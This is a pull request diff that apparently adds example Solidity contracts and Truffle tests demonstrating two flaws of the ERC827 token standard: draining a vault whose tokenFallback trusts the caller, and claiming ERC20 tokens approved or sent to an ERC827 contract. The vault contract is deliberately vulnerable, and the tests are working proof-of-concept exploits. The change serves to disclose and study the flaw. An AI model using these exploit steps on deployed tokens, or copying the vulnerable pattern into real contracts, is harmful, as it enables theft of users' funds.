### PR TITLE
Add attacks examples

### DIFF
--- a/contracts/examples/VaultAttack.sol
+++ b/contracts/examples/VaultAttack.sol
@@ -1,0 +1,43 @@
+pragma solidity ^0.4.24;
+
+contract ERC20 {
+  function transferFrom(address from, address to, uint amount) public returns (bool);
+  function transfer(address to, uint amount) public returns (bool);
+}
+
+contract ERC777 {
+  function send(address to, uint amount, bytes data) public;
+}
+
+contract VaultAttack {
+
+  mapping (address => mapping (address => uint)) private balances;
+  bool private duringDeposit;
+
+  // ERC20 (requires approval)
+  function deposit(ERC20 erc20, uint amount) external {
+    require(erc20.transferFrom(msg.sender, this, amount));
+    balances[erc20][msg.sender] += amount;
+  }
+
+  function withdraw(ERC20 erc20, uint amount) external {
+    require(balances[erc20][msg.sender] >= amount);
+    balances[erc20][msg.sender] -= amount;
+    require(erc20.transfer(msg.sender, amount));
+  }
+
+  // ERC223 / ERC677 compatibility
+  function tokenFallback(
+    address from, uint amount, bytes data
+  ) external returns (bytes4) {
+    balances[msg.sender][from] += amount;
+    return 0xc0ee0b8a;
+  }
+
+  function getBalance(
+    address token, address account
+  ) public view returns (uint256) {
+    return balances[token][account];
+  }
+
+}

--- a/contracts/mocks/ERC20TokenMock.sol
+++ b/contracts/mocks/ERC20TokenMock.sol
@@ -1,0 +1,15 @@
+pragma solidity ^0.4.24;
+
+
+import "../ERC20/StandardToken.sol";
+
+
+// mock class using ERC20 Token
+contract ERC20TokenMock is StandardToken {
+
+  constructor(address initialAccount, uint256 initialBalance) public {
+    balances[initialAccount] = initialBalance;
+    totalSupply_ = initialBalance;
+  }
+
+}

--- a/test/examples/ClaimOtherTokensAttack.js
+++ b/test/examples/ClaimOtherTokensAttack.js
@@ -1,0 +1,40 @@
+
+import EVMRevert from '../helpers/EVMRevert';
+var Message = artifacts.require('MessageHelper');
+var ERC827TokenMock = artifacts.require('ERC827TokenMock');
+var ERC20TokenMock = artifacts.require('ERC20TokenMock');
+
+var BigNumber = web3.BigNumber;
+require('chai')
+  .use(require('chai-as-promised'))
+  .use(require('chai-bignumber')(BigNumber))
+  .should();
+
+contract('ClaimOtherTokensAttack', function (accounts) {
+  let erc827, erc20;
+
+  beforeEach(async function () {
+    erc827 = await ERC827TokenMock.new(accounts[0], 100);
+    erc20 = await ERC20TokenMock.new(accounts[1], 100);
+  });
+
+  it('should be able to take ERC20 tokens in ERC827 contract', async function () {
+    await erc20.approve(erc827.address, 50, {from: accounts[1]});
+    await erc20.transfer(erc827.address, 50, {from: accounts[1]});
+
+    const getTokenBalanceData = erc20.contract.transfer
+      .getData(accounts[0], 50);
+    await erc827.transferAndCall(erc20.address, 0, getTokenBalanceData, {from: accounts[0]});
+
+    assert.equal(await erc20.balanceOf(accounts[1]), 50);
+    assert.equal(await erc20.balanceOf(accounts[0]), 50);
+
+    const claimApprovedBalanceData = erc20.contract.transferFrom
+      .getData(accounts[1], accounts[0], 50);
+    await erc827.transferAndCall(erc20.address, 0, claimApprovedBalanceData, {from: accounts[0]});
+
+    assert.equal(await erc20.balanceOf(accounts[1]), 0);
+    assert.equal(await erc20.balanceOf(accounts[0]), 100);
+  });
+
+});

--- a/test/examples/VaultAttack.js
+++ b/test/examples/VaultAttack.js
@@ -1,0 +1,38 @@
+
+import EVMRevert from '../helpers/EVMRevert';
+var Message = artifacts.require('MessageHelper');
+var ERC827TokenMock = artifacts.require('ERC827TokenMock');
+var VaultAttack = artifacts.require('VaultAttack');
+
+var BigNumber = web3.BigNumber;
+require('chai')
+  .use(require('chai-as-promised'))
+  .use(require('chai-bignumber')(BigNumber))
+  .should();
+
+contract('VaultAttack', function (accounts) {
+  let token, vault;
+
+  beforeEach(async function () {
+    token = await ERC827TokenMock.new(accounts[0], 100);
+    vault = await VaultAttack.new();
+  });
+
+  it('should take all the tokens in the Vault contract', async function () {
+    await token.approve(vault.address, 100);
+    await vault.deposit(token.address, 100);
+
+    assert.equal(await vault.getBalance(token.address, accounts[0]), 100);
+
+    const attackData = vault.contract.tokenFallback.getData(accounts[1], 100, 0x0);
+    await token.transferAndCall(vault.address, 0, attackData, {from: accounts[1]});
+
+    assert.equal(await vault.getBalance(token.address, accounts[1]), 100);
+
+    await vault.withdraw(token.address, 100, {from: accounts[1]});
+
+    assert.equal(await token.balanceOf(accounts[1]), 100);
+    assert.equal(await token.balanceOf(accounts[0]), 0);
+  });
+
+});


### PR DESCRIPTION
- Add example and tests of vault contract with ERC223 / ERC677 compatibility that can be drain with ERC827 token contract.
- Add example and tests to show how tokens that are approved or transfered to ERC827 can be claimed by anyone.